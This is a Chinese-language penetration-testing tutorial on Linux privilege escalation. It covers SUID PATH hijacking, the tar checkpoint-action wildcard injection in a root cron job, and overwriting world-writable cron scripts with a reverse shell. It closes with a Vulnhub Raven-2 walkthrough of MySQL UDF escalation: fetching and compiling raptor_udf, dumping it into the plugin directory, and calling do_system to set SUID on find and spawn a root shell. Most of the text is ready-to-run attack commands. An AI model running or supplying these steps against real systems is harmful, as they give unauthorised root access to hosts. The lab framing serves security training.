条件:ROOT用户对某个第三方程序(管理员自己写的运维脚本等)给予了SUID权限
探针:find / -user root -perm -4000 -print 2>/dev/null 探测除系统命令外管理员添加的具有suid权限的文件
root用户讲可执行文件进行编译,保证文件的正常授权运行,给予ROOT权限执行
domo.c
#include
void main()
{ setuid(0);
setgid(0);
system("ps"); #system权限执行ps命令
}
ps自带的环境变量 路径:
[fragile@localhost tmp]# whereis ps
ps: /usr/bin/ps /usr/share/man/man1/ps.1.gz /usr/share/man/man1p/ps.1p.gz
编译demo文件重命名为shell(给到了suid权限),赋予执行权限 执行后运行ps命令
gcc demo.c -o shell
chmod u+s shell
chmod命令+s参数解释如下:
s 在文件执行时把进程的属主或组ID置为该文件的文件属主。
原来只有某用户可以执行httpd这条命令, u+s后其他用户都可享有文件属主的权限。通过chown将文件属主调整为root,这样其他用户即可以root权限操作该文件。
普通用户通过对文件反编译或源代码查看,覆盖其执行环境变量,直接让其执行指定程序获取权限
cp /bin/bash /104/ps
export PATH=/104:$PATH
./shell
id
解释
原ps命令查看当前进程 环境变量为/usr/bin/ps
环境变量加入104 执行ps相当于执行/104/ps
将/bin/bash复制为 /104/ps 相当于现在的/104/ps是bash命令
shell执行 system权限执行ps命令 相当于suid执行bash就是直接提权
实战应用
- 普通用户权限下先获取suid所有程序
- 去除系统自带的一些命令(筛选第三方程序)
- 对该程序进行反编译或者找源码 明白该程序的作用
- 思考该程序有无执行一些环境变量命令 (ps ping su sudo 等 比如该shell程序执行了ps命令)
- 尝试通过复制suid提权命令 复制替换原来的执行命令 (先添加环境变量 优先执行复制后的命令)
注:当前目录优先级高于环境变量
背景:运维为了防止数据丢失等,写一个定时任务进行数据的打包压缩
数据打包命令可以尝试添加参数调用其他命令执行
tar zxf 1.tar.gz /var/www/*
提权通过获取计划任务执行文件信息进行提权
相对路径和绝对路径执行
计划任务命令存在参数调用
利用计划任务的备份功能tar命令的参数利用
定时任务crontab配置文件:
backup.sh
cd /tmp/;tar czf /tmp/backup.tar.gz * #压缩当前目录所有文件至/tmp/backup.tar.gz
[root@localhost tmp]# cat /etc/crontab #定义每分钟执行一次脚本
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
* * * * * root /tmp/backup.sh
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
Linux-定时任务配合tar操作-suid提权基础
这里解压后不是明显的/tmp目录下文件的原因是,边压缩文件的同时该目录下文件也在变化,不应该备份到当前目录下
echo "" > "--checkpoint-action=exec=sh test.sh" #将空文件写入--checkpoint-action=exec=sh test.sh中
echo "" > --checkpoint=1
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > test.sh #写入命令 chmod +s对可执行文件升级权限 赋予suid权限
chmod +x test.sh
Linux-定时任务打包配合SUID提权
tar --checkpoint=1 #调用其他命令执行
https://pentestlab.blog/2017/09/25/suid-executables/ 允许suid提权至root权限 系统命令查询
解释
定时任务执行/tmp/backup.sh
cd /tmp/;tar czf /tmp/backup.tar.gz *
tar czf /tmp/backup.tar.gz --checkpoint-action=exec=sh test.sh
tar czf /tmp/backup.tar.gz --checkpoint=1
定时任务进行文件压缩的时候利用tar命令进行命令执行 与文件名进行拼接 从而间接执行test.sh文件
执行当前目录的bash程序 借助suid进行bash提权
由于定时任务是root用户下发的,所以执行中是root权限
实战应用
查看定时任务· 定时任务有没有可利用 (tar打包压缩等)
可能会出现的错误:您在 /var/spool/mail/root 中有新邮件
将backup.sh 权限设置为可执行就可以了
注:一般适用于本地用户提权 webshell权限可能看不了压缩后的目录文件
部分操作是需要管理员权限,因为是模拟管理员开启的定时任务。
Linux 下的每个文件都有以下三种权限
r:表示读取,对应的数字为 4
w:表示写入,对应的数字为 2
x:表示执行,对应的数字为 1
通过 4、2、1 的组合,进行权限分配
利用不安全的权限分配操作导致的定时文件覆盖
chmod 777 775 等 所有者 组 其他成员说明
什么意思呢?就是管理员或运维人员在使用定时任务进行bash脚本时,提前会赋予脚本执行权限
比如chmod +x xxx.sh chmod 555 xxx.sh 这些都是正常的,但是有些管理员可能会由于粗心直接设置chmod 777 xxx.sh 此时普通用户也具有w权限,即具有写入权限,拿到普通用户权限之后可以直接修改xxx.sh,比如在脚本中添加反弹shell命令,从而利用定时任务执行反弹shell(执行为root权限)。
MDUT 2.0 数据库利用工具 github地址见文章底部(有最新工具版本) V2.1.1版本百度云链接
https://www.vulnhub.com/entry/raven-2,269/ 靶场下载地址 百度云链接
Vulnhub靶机-探针IP及端口-利用漏洞获取web权限-信息收集-查看数据库配置文件-利用Mysql提权Linux(Mysql版本区别同Windows)
#探针IP及端口
nmap 10.10.10.0/24 探测到靶机
靶机利用参考
这里我们只做mysql提权利用
python D:/Myproject/40974.py
nc -lvvp 4444
#写入后门利用菜刀连接方便操作
echo '' >1.php
上传信息收集脚本进行提权信息收集
./LinEnum.sh 注意配置执行权限 具体使用方法见我的上一篇博客
翻阅数据库配置文件获取root密码:
数据库只允许本地连接 使用哥斯拉连接
设置root用户可以外联
外部连接数据库还是失败,可能原因是靶机防火墙进行设置不允许其他外部主机连接数据库
思路:
手工提权(在webshell上面的数据库管理进行提权) 自己连自己
隧道出网(用外部或本机的工具项目提权 建立隧道)
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'R@v3nSecurity' WITH GRANT OPTION;
隧道出网演示:
整体过程演示
使用MDUT对raven-2 靶机MySQLUDF自动化提权
下载mysql udf kali poc进行编译
wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so
上传或下载1518到目标服务器
wget https://xx.xx.xx.xx/1518.so
进入数据库进行UDF导出
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
创建do_system函数调用
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
touch whgojp
find whgojp –exec "whoami" \;
find whgojp –exec "/bin/sh" \;
id
其他数据库提权参考 【权限提升】六种数据库提权&口令获取
数据库自动化提权项目汇总
MDUT 2.0 数据库利用工具 https://github.com/SafeGroceryStore/MDUT MDUT
综合高危漏洞利用工具(包含各大数据库) https://github.com/Liqunkit/LiqunKit_ LiqunKit
sqlserver利用工具 https://github.com/uknowsec/SharpSQLTools
SharpSQLTools 通过套接字重用通过受损的 Microsoft SQL Server 在受限环境中执行横向移动
数据库攻击工具 https://github.com/quentinhardy/odat ODAT
https://github.com/blackarrowsec/mssqlproxy mssqlproxy ODAT:Oracle